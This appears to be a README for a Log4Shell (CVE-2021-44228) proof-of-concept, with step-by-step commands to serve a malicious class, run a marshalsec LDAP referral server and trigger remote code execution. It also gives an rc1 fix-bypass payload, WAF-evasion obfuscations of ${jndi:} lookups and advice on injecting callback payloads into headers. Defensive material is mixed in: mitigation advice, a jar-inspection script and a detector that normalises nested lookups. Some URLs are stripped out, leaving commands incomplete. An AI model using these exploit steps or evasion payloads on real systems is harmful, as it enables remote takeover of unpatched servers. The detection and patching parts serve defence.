
CVE-2021-44228 (Apache Log4j Remote Code Execution)

Affected: all log4j-core versions >=2.0-beta9 and <=2.14.1

Log4j 1.x is not affected by this particular lookup (it has no message lookup feature), but it is end-of-life and has other vulnerabilities, so we recommend updating to the latest 2.x release.

Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)


Clone this project, compile the exploit class (blob/master/src/main/java/), and start a web server that serves the compiled class so the victim JVM can download it.

git clone
cd CVE-2021-44228-Apache-Log4j-Rce


# start webserver
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888

# make sure the Python web server runs in the same directory as Exploit.class; to test, request the class and expect HTTP 200:
curl -I

Clone marshalsec and run its LDAP server, which answers the victim's JNDI lookup with a reference that redirects to the web server above:

git clone
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
# argument: the codebase URL of the web server above, followed by #Exploit (the class the victim should load)
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer ""

Build and run the trigger (blob/master/src/main/java/), which simulates a Log4j attack against a vulnerable Java web server; the calculator app will pop up:

cd CVE-2021-44228-Apache-Log4j-Rce
mvn clean package
java -cp target/log4j-rce-1.0-SNAPSHOT-all.jar log4j

# expect the following
# 1. calculator app appear
# 2. in ldapserver console,
#  Send LDAP reference result for Exploit redirecting to
# 3. in webserver console,
# - - [....] "GET /Exploit.class HTTP/1.1" 200 -


Do not rely on a current Java version to save you: newer JDK builds refuse to load classes from a remote codebase for LDAP references by default, but the lookup still runs, and chains that use classes already on the classpath remain exploitable. Update Log4j to a fixed release, or delete the JndiLookup class from the log4j-core jar. Disabling message lookup expansion (the log4j2.formatMsgNoLookups property, available from 2.10) also helps, and that expansion seems a pretty bad idea anyway; note that this flag alone was later shown to be insufficient in some non-default configurations, so patching is the real fix.
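An offline check to go with the mitigation above, written as an added example for this README (it is not code from this repository or from the Log4j project): it opens a log4j-core jar, reads the version from the pom.properties that Maven places under META-INF, and reports whether JndiLookup.class is still present. The function names, the verdict strings and the stand-in jars it builds for itself are this example's own choices; the version range is the one stated at the top of the page.

```python
"""Offline inspection of a log4j-core jar for CVE-2021-44228 exposure.

Added example for this README; it is not part of the repository. The affected
range (>=2.0-beta9 and <=2.14.1) is the one the README lists; a jar outside it
is only reported as outside the range, the script does not vouch for it.
"""
import io
import re
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(?:beta|rc)(\d+))?$")


def parse_version(text):
    """Turn '2.14.1', '2.0-beta9' or '2.15.0-rc1' into a sortable tuple.

    Pre-releases keep their number in the last slot; finals get infinity there,
    so 2.0-beta9 < 2.0 and 2.15.0-rc1 < 2.15.0.
    """
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised log4j-core version: {text!r}")
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch or 0),
            int(pre) if pre is not None else float("inf"))


AFFECTED_LOW = parse_version("2.0-beta9")
AFFECTED_HIGH = parse_version("2.14.1")


def in_affected_range(version):
    return AFFECTED_LOW <= parse_version(version) <= AFFECTED_HIGH


def inspect_jar(jar_bytes):
    """Return version, JndiLookup presence and a verdict for one jar (as bytes)."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPERTIES in names:
            for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
    has_lookup = JNDI_LOOKUP_CLASS in names
    if not has_lookup:
        verdict = "JndiLookup.class absent: lookup removed, or not a log4j-core jar"
    elif version is None:
        verdict = "JndiLookup.class present, version unknown: treat as vulnerable"
    elif in_affected_range(version):
        verdict = "VULNERABLE: version in affected range and JndiLookup.class present"
    else:
        verdict = "version outside the listed range; JndiLookup.class still present"
    return {"version": version, "jndi_lookup_present": has_lookup, "verdict": verdict}


def build_fake_jar(version, include_jndi_lookup=True):
    """Constructed stand-in jar for testing; not a real log4j-core build."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPERTIES,
                    f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        # placeholder class files (a class file magic number is enough here)
        zf.writestr("org/apache/logging/log4j/core/lookup/StrLookup.class", b"\xca\xfe\xba\xbe")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            print(inspect_jar(f.read()))
    else:
        for ver, keep in (("2.14.1", True), ("2.14.1", False), ("2.0-beta8", True)):
            state = "with" if keep else "without"
            print(f"{ver} {state} JndiLookup: {inspect_jar(build_fake_jar(ver, keep))['verdict']}")
```

Run it with the path of a log4j-core jar as the only argument; with no argument it exercises the constructed jars. A jar that still contains JndiLookup.class but carries no pom.properties is deliberately reported as vulnerable, because repackaged or shaded jars often drop that metadata.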

Bypass of the 2.15.0-rc1 fix

rc1 added a host allowlist, but the check parsed the lookup string with java.net.URI and, when parsing threw, only logged a warning and went ahead with the lookup anyway. A malformed URL, such as one with a space before the class name, therefore skips the check entirely. For example:

${jndi:ldap:// badClassName}

Bypass WAF

Don't trust the web application firewall. Lookups nest, and Log4j evaluates the inner ones first, so a rule matching the literal string "${jndi:" is defeated by spelling that keyword out through other lookups, e.g. ${${lower:j}ndi:...} or ${${::-j}ndi:...} (the ":-" default value of an empty lookup). The WAF sees the obfuscated form; Log4j sees ${jndi:...}.
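A detection aid for the nesting trick above, added here as an example (not code from this repository): rather than matching the literal "${jndi:", it re-implements enough of Log4j's lookup evaluation, innermost lookup first, lower/upper applied, every other lookup (env, sys, date, ...) treated as unresolvable so its ":-" default is taken, to normalise a line before matching. The log lines, function names and the exact subset of lookup syntax handled are this example's own choices, and it is an approximation of Log4j's parser, not a copy of it.

```python
"""Log4Shell detector that undoes the lookup nesting used to slip past WAFs.

Added example for this README, not part of the repository. A plain
"${jndi:" match misses payloads such as ${${lower:j}ndi:...}; this script
resolves nested lookups the way Log4j would (inner first) and then matches.
Only lower/upper are emulated; any other lookup is assumed to fail on the
target so that its ":-" default applies, which is what the attacker relies on.
"""
import re

# Innermost lookup: a ${...} whose body holds no further "${" or "}", and which
# is not the jndi lookup itself (that one is left in place so it can be matched).
INNERMOST = re.compile(r"\$\{(?![jJ][nN][dD][iI]\s*:)([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
MAX_PASSES = 64  # guard against pathological input


def _resolve_key(key):
    """Emulate one lookup; None means the value is unknown / would fail."""
    if ":" not in key:
        return None                       # ${::-x} style empty variable, or an unknown name
    prefix, arg = key.split(":", 1)
    prefix = prefix.strip().lower()       # Log4j lower-cases the prefix, so ${LoWeR:...} works
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    return None                           # env/sys/date/...: target-dependent, take the default


def _resolve_one(match):
    body = match.group(1)
    if ":-" in body:                      # ${lookup:-default}
        key, default = body.split(":-", 1)
        value = _resolve_key(key)
        return default if value is None else value
    value = _resolve_key(body)
    return match.group(0) if value is None else value   # unresolved and no default: keep literal


def normalize(text):
    """Resolve nested lookups innermost-first until nothing changes."""
    for _ in range(MAX_PASSES):
        new = INNERMOST.sub(_resolve_one, text)
        if new == text:
            return new
        text = new
    return text


def find_jndi(text):
    """Return the normalised ${jndi:...} payload carried by a line, else None."""
    norm = normalize(text)
    m = JNDI.search(norm)
    if not m:
        return None
    end = norm.find("}", m.start())
    return norm[m.start():(end + 1) if end != -1 else len(norm)]


def scan(lines):
    """(line number, normalised payload) for every line that carries a jndi lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        payload = find_jndi(line)
        if payload is not None:
            hits.append((number, payload))
    return hits


# Constructed access-log lines (User-Agent is the last field); not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://127.0.0.1:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://127.0.0.1:1389/a}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://127.0.0.1:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:NOTSET:-j}ndi:${lower:LDAP}://127.0.0.1:1389/a}"',
    '10.0.0.10 - - [10/Dec/2021:12:00:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${date:yyyy}"',
]

if __name__ == "__main__":
    for number, payload in scan(SAMPLE_LOG):
        print(f"line {number}: {payload}")
```

Lines 2 to 5 of the constructed log all normalise to the same ${jndi:ldap://127.0.0.1:1389/a}; line 6 keeps its ${date:yyyy} literal and is not reported. Because the emulation takes the ":-" default for every lookup it cannot evaluate, it errs towards flagging, which is the right bias for a log-review tool but means hits still need a look.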

Details Of Vuln

Lookups provide a way to add values to the Log4j configuration at arbitrary places. The problem is that, in the affected versions, the same ${...} expansion is also applied to the logged message itself, so attacker-controlled input that reaches a log call (a User-Agent header, a username, ...) can contain ${jndi:ldap://host/path}; Log4j then performs a JNDI lookup against the attacker's LDAP server, which answers with a reference to a remote class that the JVM downloads and instantiates, exactly as the steps above reproduce.


The methods that ultimately trigger the vulnerability:


Simple Check Method

For black-box testing, passive scanning is the practical approach: inject a lookup payload carrying a unique token into the request headers that are commonly logged (User-Agent, X-Forwarded-For, and so on) and watch for the resulting callback on a DNS or LDAP listener you control. A Burp Log4j scanning extension does exactly this for every request passing through the proxy.


Have Fun!!!

[screenshot: BurpLog4jScan.png]
